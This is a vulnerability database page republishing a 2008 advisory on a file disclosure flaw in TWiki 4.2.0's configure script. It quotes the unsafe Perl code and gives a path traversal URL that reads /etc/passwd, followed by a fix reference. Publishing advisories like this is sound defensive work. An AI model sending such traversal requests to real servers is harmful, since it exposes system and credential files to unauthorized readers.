Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

twiki-disclose.txt

🗓️ 19 Aug 2008 00:00:00Reported by Th1nk3rType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 14 Views

TWiki 4.2.0 File Disclosure Vulnerability in `/bin/configure` scrip

Code
`################################################################################################################  
# #  
# TWiki 4.2.0 File Disclosure Vuln (configure) #  
# #  
################################################################################################################  
  
"We're brazilian newbies!!! :p" - Th1nk3r  
  
Info  
----------------------------------------------------------------------------------------------------------------  
Classe : Input Validation Error   
Remote : Yes  
Local : No  
Date : 05/08/2008  
Credits : Th1nk3r (cnwfhguohrugbo / gmail.com)  
Greetz : w4n73d h4ck3r, Vitor, Vonnatur, FuradordeSyS, B470-Killer, M4v3rick.  
  
Description  
----------------------------------------------------------------------------------------------------------------  
TWiki version 4.2.0 (I haven't tested other versions) is vulnerable to a File Disclosure. It's only possible  
to exploit the bug if you can access the "/bin/configure" script.  
Otherwise, you can not exploit this bug.  
Vulnerable code of "/bin/configure" script:  
  
if( $action eq 'image' ) {  
# SMELL: this call is correct, but causes a perl error  
# on some versions of CGI.pm  
# print $query->header(-type => $query->param('type'));  
# So use this instead:  
print 'Content-type: '.$query->param('type')."\n\n";  
if( open(F, 'logos/'.$query->param('image' ))) {  
local $/ = undef;  
print <F>;  
close(F);  
}  
exit 0;  
}  
  
The bug is in the open() function. The file is set by visitor, and there is no protection added  
by the programmer.  
Note that "$query->param('type')" can be set by the visitor. Therefore, you'll set it to "text/plain".  
  
  
  
Exploit  
----------------------------------------------------------------------------------------------------------------  
  
To exploit the bug, you just need set the "image" variable to the path of file you wish to view.   
The file will be revealed if you have permission to view it.  
  
By example, to show the "/etc/passwd" file content, go to :  
http://www.examplo.org/{PATH}/bin/configure?action=image;image=../../../../../../etc/passwd;type=text/plain  
  
  
  
Solution  
----------------------------------------------------------------------------------------------------------------  
Read "http://twiki.org/cgi-bin/view/TWiki/TWikiInstallationGuide", Basic Installation, topic 8, for   
more information of how to protect your "configure" script.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
19 Aug 2008 00:00Current
7.4High risk
Vulners AI Score7.4
input validation errorfile disclosuretwiki 4.2.0vulnerable codeexploitcgi.pmsolutionremotelocaldatecreditsvulnerable scriptfile pathpermissioninstallation guide
14